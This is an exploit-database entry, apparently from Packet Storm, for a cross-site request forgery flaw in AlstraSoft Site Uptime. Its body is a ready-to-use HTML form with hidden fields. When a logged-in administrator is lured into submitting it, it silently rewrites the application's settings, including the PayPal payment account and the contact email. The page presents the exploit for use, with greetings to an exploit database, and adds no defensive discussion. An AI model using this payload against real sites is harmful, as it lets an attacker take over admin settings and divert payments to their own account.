AlstraSoft Site Uptime Cross Site Request Forgery

2012-04-05T00:00:00
ID PACKETSTORM:111563
Type packetstorm
Reporter Jonturk75
Modified 2012-04-05T00:00:00

Description

                                        
                                            `# Exploit Title: AlstraSoft Site Uptime CSRF  
# Author: Jonturk75  
# Vendor or Software Link: http://www.scripts.com/viewscript/alstrasoft-site-uptime/19680/  
# Category:: webapps  
# Demo : http://www.blizsoft.com/uptime/admin  
# Greetz: Inj3ct0r Exploit DataBase 1337day.com  
  
  
<form name="frmCSet" action="commonsettings.php" method="get">  
<input name="rbShowCount" value="Y" checked="" type="hidden">  
<input name="rbShowCount" value="N" type="hidden">  
<input name="act" id="act" value="Update" type="hidden"></td>  
<input name="txtpaypal" value="yourpaypalacc@paypal.com" type="hidden"></td>  
<input name="txtcheckout" value="g0002" type="hidden">  
<input name="txtcontact" value="mail@mail.com" type="hidden"></td>  
<input name="btnUpdate" class="button" id="btnUpdate" value="Save Settings" type="submit">   
<input name="BtnCancel" class="button" id="BtnCancel" value="Cancel" onclick="cancel();" type="hidden"></td>  
</form>  
  
  
`